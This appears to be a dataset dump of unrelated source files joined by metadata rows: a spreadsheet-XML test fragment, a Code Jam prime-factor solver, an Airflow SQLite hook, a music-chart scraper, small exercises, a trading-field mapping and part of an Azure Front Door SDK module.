            <cfvo type="percent" val="33"/>
            <cfvo type="percent" val="67"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A2">
            <cfRule type="iconSet" priority="2">
            <iconSet iconSet="3Flags">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="33"/>
            <cfvo type="percent" val="67"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A3">
            <cfRule type="iconSet" priority="3">
            <iconSet iconSet="3TrafficLights2">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="33"/>
            <cfvo type="percent" val="67"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A4">
            <cfRule type="iconSet" priority="4">
            <iconSet iconSet="3Symbols">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="33"/>
            <cfvo type="percent" val="67"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A5">
            <cfRule type="iconSet" priority="5">
            <iconSet iconSet="4Arrows">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="25"/>
            <cfvo type="percent" val="50"/>
            <cfvo type="percent" val="75"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A6">
            <cfRule type="iconSet" priority="6">
            <iconSet iconSet="4RedToBlack">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="25"/>
            <cfvo type="percent" val="50"/>
            <cfvo type="percent" val="75"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A7">
            <cfRule type="iconSet" priority="7">
            <iconSet iconSet="4TrafficLights">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="25"/>
            <cfvo type="percent" val="50"/>
            <cfvo type="percent" val="75"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A8">
            <cfRule type="iconSet" priority="8">
            <iconSet iconSet="5ArrowsGray">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="20"/>
            <cfvo type="percent" val="40"/>
            <cfvo type="percent" val="60"/>
            <cfvo type="percent" val="80"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <conditionalFormatting sqref="A9">
            <cfRule type="iconSet" priority="9">
            <iconSet iconSet="5Quarters">
            <cfvo type="percent" val="0"/>
            <cfvo type="percent" val="20"/>
            <cfvo type="percent" val="40"/>
            <cfvo type="percent" val="60"/>
            <cfvo type="percent" val="80"/>
            </iconSet>
            </cfRule>
            </conditionalFormatting>
            <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
            </worksheet>
            """
        )

        got = _xml_to_list(fh.getvalue())

        self.assertEqual(got, exp)
| [
"[email protected]"
] | |
def isprime(n):
    """Return True iff n is a prime number.

    BUGFIX: the original was a single Fermat test base 2
    (pow(2, n-1, n) == 1), which wrongly accepts base-2 pseudoprimes such
    as 341 and 561.  This deterministic Miller-Rabin variant (witnesses
    2..37) is exact for all n < 3.3e24, far beyond this program's range.
    Non-positive n and 1 return False.
    """
    if n < 2:
        return False
    small_primes = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    for p in small_primes:
        if n % p == 0:
            return n == p
    # Write n - 1 as d * 2**r with d odd.
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in small_primes:
        x = pow(a, d, n)
        if x == 1 or x == n - 1:
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
    """Return the smallest factor of num in [2, num), or None if num is
    prime (or < 4, where no such factor exists).

    Trial division only needs to reach sqrt(num): any composite has a
    factor there, so this is O(sqrt n) instead of the original O(n) scan,
    while returning exactly the same values.
    """
    from math import isqrt  # local import: this file has no import section
    if num < 2:
        return None
    for i in range(2, isqrt(num) + 1):
        if num % i == 0:
            return i
    return None
def main():
    """Generate and print candidate 'coins' with their factor witnesses.

    Appears to solve Google Code Jam 2016 Qualification C ("Coin Jam"):
    print N-digit binary strings (first and last digit 1) that are
    composite when interpreted in every base 2..10, together with one
    nontrivial factor per base — TODO confirm against the problem spec.
    """
    data = []
    print("Case #1:")
    # data[i] = [smallest, largest] odd candidate with i+1 binary digits:
    # 2**i + 1 .. 2**(i+1) - 1 (both endpoints have leading/trailing 1).
    for i in range(35):
        num = 2**i
        # print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
        data.append([num+1, int(num*2-1)])
    N = 32  # required "coin" length in digits
    count = 0
    startingNumber = data[N-1][0]
    finalNumber = data[N-1][1]
    # Step by 2 so the last binary digit stays 1.
    for i in range(startingNumber, finalNumber+1, 2):
        numstr = bin(i)[2:]
        # The candidate digit string interpreted in every base 2..10.
        base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
        # print(base)
        # flag ends up 1 only when every interpretation is composite;
        # any prime interpretation clears it and stops the scan.
        flag = 0
        for j in base:
            if not isprime(j):
                flag = 1
            else:
                flag = 0
                break
        if flag == 1:
            # Emit at most 700 jamcoins (plus the candidates counted
            # before the cut-off check below).
            if count >= 700:
                break
            else:
                count = count + 1
                # Output: the base-10 interpretation followed by one
                # nontrivial divisor for each base 2..10.
                answer = str(base[10-2])
                for k in base:
                    answer += " " + str(isDivisibleBy(k))
                print(answer)
if __name__ == '__main__':
main() | [
"[[email protected]]"
] | |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2 | c7027edceeae907ce7d21112336e84f101eeb89b | /airflow/providers/sqlite/hooks/sqlite.py | 5a14249ca5902174edf5d6b29c533545cbd950d7 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jao6693/airflow | 0a8027ce33e20ee8f6032facb1b8ab453c2d20d4 | 269b608246b015c55e6cae4ed0f50b1e2bb0fa95 | refs/heads/main | 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 | Apache-2.0 | 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null | UTF-8 | Python | false | false | 1,618 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
    """Interact with SQLite."""

    conn_name_attr = 'sqlite_conn_id'
    default_conn_name = 'sqlite_default'
    conn_type = 'sqlite'
    hook_name = 'Sqlite'
    placeholder = '?'

    def get_conn(self) -> sqlite3.dbapi2.Connection:
        """Returns a sqlite connection object"""
        airflow_conn = self.get_connection(getattr(self, self.conn_name_attr))
        # The Airflow connection's host field holds the database file path.
        return sqlite3.connect(airflow_conn.host)

    def get_uri(self) -> str:
        """Override DbApiHook get_uri method for get_sqlalchemy_engine()"""
        airflow_conn = self.get_connection(getattr(self, self.conn_name_attr))
        return f"sqlite:///{airflow_conn.host}"
| [
"[email protected]"
] | |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3 | d79f3a31d173f18ec112c521acdcee8e8e73724d | /test5.py | 7cd08b85a12191df9c24b5d26bcedcd5412f72de | [] | no_license | k156/hello | 3de815de569b38f8260e774e57b138f4da43f480 | f5a7f386d3f78d15d7f166a95ad25724e168f472 | refs/heads/master | 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from bs4 import BeautifulSoup
import requests
from time import sleep  # NOTE(review): unused here — presumably kept for crawl-delay experiments

# Browser-like User-Agent so the site does not reject the scripted request.
headers = {
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
# Melon (Korean music service) realtime chart page.
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"
html = requests.get(url, headers = headers).text
# BeautifulSoup is imported on the first line of this file.
soup = BeautifulSoup(html, 'html.parser')

# Top-50 chart entries are <tr id="lst50"> rows of the chart table.
trs = soup.select("tr#lst50")
for tr in trs:
    tds = tr.select('td')
    rank = tds[1].text  # assumed to be the rank cell — confirm against page markup
    title = tds[4]      # song-title cell (still a Tag, not extracted text)
    # singer =
    # print(rank, title, type(title))
print(rank, title, type(title)) | [
"[email protected]"
] | |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5 | e452f89c51180487f2ed68c33ca2fed54e14a967 | /1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py | 4d9450ac08bdcaf06642e2351b5898ce2cc0b984 | [
"MIT"
] | permissive | karolinanikolova/SoftUni-Software-Engineering | c996f18eea9fb93164ab674614e90b357ef4858a | 7891924956598b11a1e30e2c220457c85c40f064 | refs/heads/main | 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # 1. Проверка за отлична оценка
# (Translated from Bulgarian:) Write a console program that reads a grade
# (a real number) entered by the user and prints "Excellent!" when the
# grade is 5.50 or higher.
grade = float(input())
if grade >= 5.50:
print("Excellent!") | [
"[email protected]"
] | |
b9e01fd5c696231a6b883b2817e73b84b476dbaa | 1646b3fe9000c3109695e99b4bb75679577906ff | /236.LowestCommonAncestorOfABinaryTree.py | 78bdf6a542e4686bb190fc7b9d792fdb40e9fbeb | [] | no_license | yao9208/lc | 5ecf6720886beb951c9a70433f53a0ec0bcb74dc | 024c1b5c98a9e85706e110fc2be8dcebf0f460c3 | refs/heads/master | 2020-04-03T20:55:40.199637 | 2017-02-10T08:30:46 | 2017-02-10T08:30:46 | 56,478,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if not root:
return root
if root==p or root==q:
return root
left = self.lowestCommonAncestor(root.left, p, q)
right = self.lowestCommonAncestor(root.right, p, q)
if left:
if right:
return root
else:
return left
return right
| [
"[email protected]"
] | |
1f2424d5b24baaab7fe1c1ce30f92fcfc2ec1dd1 | 7ea5517353f325fc0bcc0e552233b103335bc9ec | /QUANTAXIS/QAMarket/common.py | 143b325f56b9ba86e312c9a8f7bbeee7f3dbd0fd | [
"MIT"
] | permissive | lxqjswa/QUANTAXIS | 304f20c3ba957d51664a8736faca6a777a658583 | a5f89b28a75d1a5094630a4ed166f596840528b1 | refs/heads/master | 2020-03-28T08:45:47.064394 | 2018-09-08T07:15:26 | 2018-09-08T07:15:26 | 147,987,895 | 1 | 0 | MIT | 2018-09-09T02:52:34 | 2018-09-09T02:52:34 | null | UTF-8 | Python | false | false | 5,031 | py |
# shipane
# "申报时间", "证券代码", "证券名称", "操作", "委托状态", "委托数量", "成交数量", "撤消数量", , "委托价格", "成交均价", "合同编号", "委托子业务", "约定号", "对方账户", "参考汇率", "结算币种", "交易币种", "证券中文名", "出错信息
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION, TRADE_STATUS, ORDER_STATUS
# Mapping from Chinese column headers (as returned by broker / simulated
# trading front-ends such as ShiPanE) to QUANTAXIS English field names.
# NOTE(review): several keys appear more than once ('场外撤单', '场内撤单',
# '未成交', '全部撤单'); the later entry silently wins, which is harmless
# only because the duplicated values are identical.
cn_en_compare = {'明细': 'id',
                 '证券代码': 'code',
                 '市场代码': 'market_code',
                 '证券名称': 'name',
                 '股票余额': 'amount',
                 '可用余额': 'sell_available',
                 '冻结数量': 'frozen',
                 '买卖标志': 'towards',
                 '撤消数量': 'cancel_amount',
                 '撤单数量': 'cancel_amount',
                 '订单类型': 'order_type',
                 '操作': 'towards',  # buy/sell flag in simulated trading
                 '委托价格': 'order_price',
                 '委托数量': 'order_amount',
                 '成交价格': 'trade_price',
                 '成交数量': 'trade_amount',
                 '状态说明': 'status',
                 '备注': 'status',  # the status column in simulated trading
                 '场外撤单': 'cancel_outside',
                 '场内撤单': 'cancel_inside',
                 '未成交': 'pending',
                 '全部撤单': 'cancel_all',
                 '委托时间': 'order_time',
                 '合同编号': 'realorder_id',  # order id in simulated trading
                 '撤销数量': 'cancel_amount',
                 '委托编号': 'realorder_id',
                 '批次号': 'pc_id',
                 '盈亏': 'pnl',
                 "": 'None',
                 '成本金额': 'cost',
                 '盈亏估算': 'pnl_prob',
                 '成本价': 'hold_price',
                 '实现盈亏': 'pnl_money_already',
                 '盈亏比例(%)': 'pnl_ratio',
                 '市价': 'price',
                 '市值': 'market_value',
                 '交易市场': 'SSE',
                 '股东帐户': 'shareholders',
                 '实际数量': 'total_amount',
                 '可申赎数量': 'redemption_number',
                 '资讯': 'message',
                 '汇率': 'exchange_rate',
                 '沪港深港市场': 'hkmarket',
                 '成本价港币': 'hold_price_hk',
                 '买入成本价港币': 'buy_price_hk',
                 '买入在途数量': 'buy_onway',
                 '卖出在途数量': 'sell_onway',
                 '场内废单': 'failled',
                 '场外撤单': 'cancel_outside',
                 '场内撤单': 'cancel_inside',
                 '未成交': 'pending',
                 '已成交': 'finished',
                 '全部撤单': 'cancel_all',
                 '成交均价': 'trade_price',  # executed price
                 '成交金额': 'trade_money',
                 '成交编号': 'trade_id',
                 '委托状态': 'status',
                 '申报时间': 'order_time',
                 '委托日期': 'order_date',
                 '委托子业务': 'order_subjob',
                 '约定号': 'yd_id',
                 '对方账户': 'other_account',
                 '参考汇率': 'refer_exchange',
                 '结算币种': 'settlement_currency',
                 '交易币种': 'trade_currency',
                 '证券中文名': 'CNname',
                 '出错信息': 'error',
                 '成交时间': 'trade_time'}
# Chinese trade-direction labels -> ORDER_DIRECTION constants.
# The empty string maps to OTHER so unlabeled rows still resolve.
trade_towards_cn_en = {
    '买入': ORDER_DIRECTION.BUY,
    '买': ORDER_DIRECTION.BUY,
    '卖出': ORDER_DIRECTION.SELL,
    '卖': ORDER_DIRECTION.SELL,
    '申购': ORDER_DIRECTION.ASK,
    '申': ORDER_DIRECTION.ASK,
    '证券买入': ORDER_DIRECTION.BUY,
    '证券卖出': ORDER_DIRECTION.SELL,
    '派息': ORDER_DIRECTION.XDXR,
    '': ORDER_DIRECTION.OTHER
}
# Chinese order-status labels -> ORDER_STATUS constants.
# (Inline notes translated from the original Chinese comments.)
order_status_cn_en = {
    '已报': ORDER_STATUS.QUEUED,  # order accepted by the trading endpoint
    '未成交': ORDER_STATUS.QUEUED,
    '已确认': ORDER_STATUS.QUEUED,  # new-share (IPO) subscription accepted
    '场内废单': ORDER_STATUS.FAILED,
    '废单': ORDER_STATUS.FAILED,  # violates trading rules; rejected by the endpoint
    '未报': ORDER_STATUS.FAILED,  # not yet accepted by the trading endpoint
    '场外废单': ORDER_STATUS.FAILED,
    '已成交': ORDER_STATUS.SUCCESS_ALL,
    '已成': ORDER_STATUS.SUCCESS_ALL,
    '全部成交': ORDER_STATUS.SUCCESS_ALL,
    '部成': ORDER_STATUS.SUCCESS_PART,  # partially filled
    '已撤单': ORDER_STATUS.CANCEL_ALL,
    '全部撤单': ORDER_STATUS.CANCEL_ALL,
    '已撤': ORDER_STATUS.CANCEL_ALL,
    '已报待撤': ORDER_STATUS.QUEUED,  # cancel submitted and accepted, still waiting (e.g. outside trading hours)
    '场内撤单': ORDER_STATUS.CANCEL_ALL,
}
| [
"[email protected]"
] | |
e53c50114defbb9001385514940c7f56071976fb | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc032/abc032_b/8108449.py | b7cc2e87327a45202a747c78434008246dab432c | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | S=input()
k=int(input())
import collections
table=collections.defaultdict(int)
for i in range(len(S)-k+1):
table[S[i:k+i]]+=1
print(len(list(table.keys())))
| [
"[email protected]"
] | |
cb0e122b4c0e9234e1f0f0e11d6affdfaed10c6a | aa0270b351402e421631ebc8b51e528448302fab | /sdk/network/azure-mgmt-frontdoor/azure/mgmt/frontdoor/aio/operations/_experiments_operations.py | 3447700b37de7b3edc5130e30a769d21572d3f89 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 38,260 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._experiments_operations import (
build_create_or_update_request,
build_delete_request,
build_get_request,
build_list_by_profile_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ExperimentsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.frontdoor.aio.FrontDoorManagementClient`'s
:attr:`experiments` attribute.
"""
models = _models
    def __init__(self, *args, **kwargs) -> None:
        # Auto-generated plumbing: the operation group is constructed with
        # either positional (client, config, serializer, deserializer)
        # arguments or the equivalent keyword arguments.
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_profile(
self, resource_group_name: str, profile_name: str, **kwargs: Any
) -> AsyncIterable["_models.Experiment"]:
"""Gets a list of Experiments.
Gets a list of Experiments.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Experiment or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[_models.ExperimentList] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_profile_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ExperimentList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list_by_profile.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> _models.Experiment:
"""Gets an Experiment by ExperimentName.
Gets an Experiment by ExperimentName.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Experiment or the result of cls(response)
:rtype: ~azure.mgmt.frontdoor.models.Experiment
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _create_or_update_initial(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: Union[_models.Experiment, IO],
**kwargs: Any
) -> _models.Experiment:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "Experiment")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Experiment", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Experiment", pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: _models.Experiment,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Creates or updates an Experiment.
Creates or updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment resource. Required.
:type parameters: ~azure.mgmt.frontdoor.models.Experiment
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Creates or updates an Experiment.
Creates or updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment resource. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
    self,
    resource_group_name: str,
    profile_name: str,
    experiment_name: str,
    parameters: Union[_models.Experiment, IO],
    **kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
    """Creates or updates an Experiment.

    Creates or updates an Experiment.

    :param resource_group_name: Name of the Resource group within the Azure subscription. Required.
    :type resource_group_name: str
    :param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
    :type profile_name: str
    :param experiment_name: The Experiment identifier associated with the Experiment. Required.
    :type experiment_name: str
    :param parameters: The Experiment resource. Is either a model type or a IO type. Required.
    :type parameters: ~azure.mgmt.frontdoor.models.Experiment or IO
    :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
     Default value is None.
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
